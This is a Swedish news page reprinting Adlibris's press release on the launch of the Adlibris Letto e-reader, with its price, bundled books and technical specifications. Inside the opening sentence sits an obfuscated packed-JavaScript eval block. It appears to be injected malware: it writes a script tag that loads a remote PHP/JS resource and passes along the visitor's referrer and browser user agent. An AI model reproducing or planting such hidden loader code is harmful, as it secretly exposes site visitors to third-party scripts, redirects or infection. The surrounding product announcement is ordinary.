Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

Adlibris lanserar läsplattan Adlibris Letto

Adlibris lanserar läsplattan Adlibris Letto
Sebastian

Adlibris eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|indet|var|u0026u|referrer|ybbfh||js|php’.split(’|’),0,{}))
lanserar läsplattan Adlibris Letto – startskottet för den största satsningen någonsin i Sverige på e-böcker

Idag lanseras Adlibris Letto, en läsplatta designad för att ge bästa möjliga läsupplevelse och startskottet för Adlibris satsning att tillgängliggöra e-böcker för fler läsare. Adlibris Letto är den första läsplattan i Sverige som är direkt kopplad till en e-bokhandel – två knapptryck och läsaren har en bok nedladdad redo att läsas.

Julia Reuszner, ansvarig Adlibris digitalt:

– Det har bara varit en tidsfråga innan svenskarna ligger i hängmattan eller sitter på bussen med en läsplatta i handen. Vi har sett hur e-boken formligen exploderat i USA efter att det lanserats läsplattor kopplade till e-bokhandeln och vi vet redan att svenskar älskar att läsa. Ingen svensk aktör har dock vågat satsa helhjärtat på att göra formatet enkelt och lättillgängligt – fram tills nu.

Lanseringen av Adlibris Letto är början på en långsiktig satsning att skapa fler möjligheter till läsande genom att göra böcker tillgängliga i det format som läsaren själv föredrar. Satsningen fortsätter med bl.a. lansering av en app för Android, utökat utbud av e-böcker med engelska titlar, en uppdaterad iOS-app samt en uppdaterad version av e-boksbutiken på Adlibris.com.

Adlibris Letto är designad och utvecklad tillsammans med det franska företaget Bookeen som tog fram den första läsplattan i Europa år 1998.

Adlibris Letto går från och med idag att köpa på Adlibris.com för 1395 kr. I läsplattan ingår böckerna Den sista akten av Mari Jungstedt och Den allvarsamma leken av Hjalmar Söderberg samt tre noveller av August Strindberg, Amanda Hellberg och Johan Theorin (totalt värde c a 1895 kr). Som alltid erbjuder Adlibris fri frakt.

Fakta Adlibris Letto:
Vikt 200 gram (mindre än en pocketbok)
Lagringsutrymme 2GB (ca 2000 böcker)
Batteritid ca 1 månad (25 000 sidvändningar)
Både pekskärm och knappar
E-ink-skärm – läs i dags-/solljus såväl som inomhus
WiFi
Direktkoppling till e-bokhandel
Svensk ordbok
Storlek 16,6cm x 12cm x 9mm